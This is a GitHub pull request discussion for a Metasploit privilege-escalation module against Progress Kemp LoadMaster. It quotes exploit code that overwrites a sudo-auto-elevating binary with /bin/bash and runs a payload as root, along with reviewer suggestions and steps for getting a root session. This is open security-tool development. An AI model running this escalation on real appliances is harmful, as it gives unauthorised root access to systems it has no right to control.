Add Kemp Progress Loadmaster sudo abuse priv esc #19100
Open
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bwatters-r7
added
module
rn-modules
jvoisin
reviewed
Apr 23, 2024
Comment on lines
87
to
97
| cmd_exec("sudo /bin/cp #{datastore['TARGET_BINARY']} #{datastore['BINARY_RENAME']}") | ||
|
|
||
| vprint_status("Moving /bin/bash to #{datastore['TARGET_BINARY']}") | ||
| cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}") | ||
|
|
||
| vprint_status('Launching payload') | ||
| cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") | ||
| ensure | ||
| if exists?(datastore['BINARY_RENAME']) | ||
| cmd_exec("sudo /bin/cp #{datastore['BINARY_RENAME']} #{datastore['TARGET_BINARY']}") | ||
| cmd_exec("sudo /bin/rm #{datastore['BINARY_RENAME']}") |
There was a problem hiding this comment.
For a couple of those commands, sudo isn't required I think
There was a problem hiding this comment.
I believe I fixed that.....
Comment on lines
86
to
93
| vprint_status("Moving #{datastore['TARGET_BINARY']} to #{datastore['BINARY_RENAME']}") | ||
| cmd_exec("sudo /bin/cp #{datastore['TARGET_BINARY']} #{datastore['BINARY_RENAME']}") | ||
|
|
||
| vprint_status("Moving /bin/bash to #{datastore['TARGET_BINARY']}") | ||
| cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}") | ||
|
|
||
| vprint_status('Launching payload') | ||
| cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") |
There was a problem hiding this comment.
Why use /bin/bash to launch the payload, instead of launching it directly?
There was a problem hiding this comment.
You're right. I had played with it earlier, and it did not seem to work. I think my problem was that I was trying to directly copy, and I did not have the privileges to overwrite it directly, and needed to put the file in a temp location, then sudo cp the file over /bin/loadkeys. Switched to that, now, unless we're running a command payload.
bwatters-r7
force-pushed
the
module/loadmaster-priv-esc
branch
from
8071197
to
742326a
Compare
bwatters-r7
commented
May 2, 2024
| cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}") | ||
|
|
||
| vprint_status('Launching payload') | ||
| cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") |
There was a problem hiding this comment.
Suggested change
| cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") | |
| cmd_exec("sudo '#{datastore['TARGET_BINARY']}' -c #'{datastore['TEMP_PAYLOAD']}'") |
|
All suggestions on #19150 should be addressed here, too.... |
bwatters-r7
commented
May 6, 2024
| execute_command(target_binary, binary_rename, payload.encoded) | ||
| end | ||
| ensure | ||
| cmd_exec("sudo rm '#{target_binary}'") |
There was a problem hiding this comment.
Suggested change
| cmd_exec("sudo rm '#{target_binary}'") | |
| cmd_exec("sudo rm '#{target_binary}'") unless target_binary_hash == file_remote_digestmd5(target_binary) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This adds a privilege escalation module targeting Progress Kemp LoadMaster versions including
7.2.59.2.22338. The vulnerability lies in the configuration to allowsudoto auto elevate when run with certain files, but grants the non-root userbalwrite permissions to those file. This exploit simply overwrites one of the files that auto-elevates with/bin/bashand runs a payload within a root-enabled /bin/bash session.Verification
List the steps needed to make sure this thing works
baluseruse exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024set SESSION <session>set LHOST <your host IP>runrootuser.Note
The easiest way to test this is in conjunction with #18972, which this was a part of until we realized that when they patched CVE-2024-1212, they did not patch this.